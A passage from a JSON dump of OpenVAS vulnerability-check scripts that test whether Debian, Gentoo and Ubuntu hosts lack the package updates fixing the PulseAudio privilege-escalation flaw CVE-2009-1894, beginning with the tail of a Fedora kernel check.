rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:35", "description": 
"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064476", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64476\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", 
rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:32", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064435", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64435\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:11", "description": "The remote host is missing updates announced in\nadvisory GLSA 200907-13.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200907-13 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64435", "href": "http://plugins.openvas.org/nasl.php?oid=64435", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in PulseAudio may allow a local user to execute code with\nescalated privileges.\";\ntag_solution = \"All PulseAudio users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200907-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=276986\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200907-13.\";\n\n \n \n\nif(description)\n{\n script_id(64435);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200907-13 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n 
script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/pulseaudio\", unaffected: make_list(\"ge 0.9.9-r54\"), vulnerable: make_list(\"lt 0.9.9-r54\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:58", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory USN-804-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-804-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64445", "href": "http://plugins.openvas.org/nasl.php?oid=64445", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_804_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_804_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-804-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n pulseaudio 0.9.10-1ubuntu1.1\n\nUbuntu 8.10:\n pulseaudio 0.9.10-2ubuntu9.4\n\nUbuntu 9.04:\n pulseaudio 1:0.9.14-0ubuntu20.2\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-804-1\";\n\ntag_insight = \"Tavis Ormandy and Yorick Koster discovered that PulseAudio did not\nsafely re-execute itself. 
A local attacker could exploit this to gain\nroot privileges.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory USN-804-1.\";\n\n \n\n\nif(description)\n{\n script_id(64445);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-804-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-804-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", 
ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", 
ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", 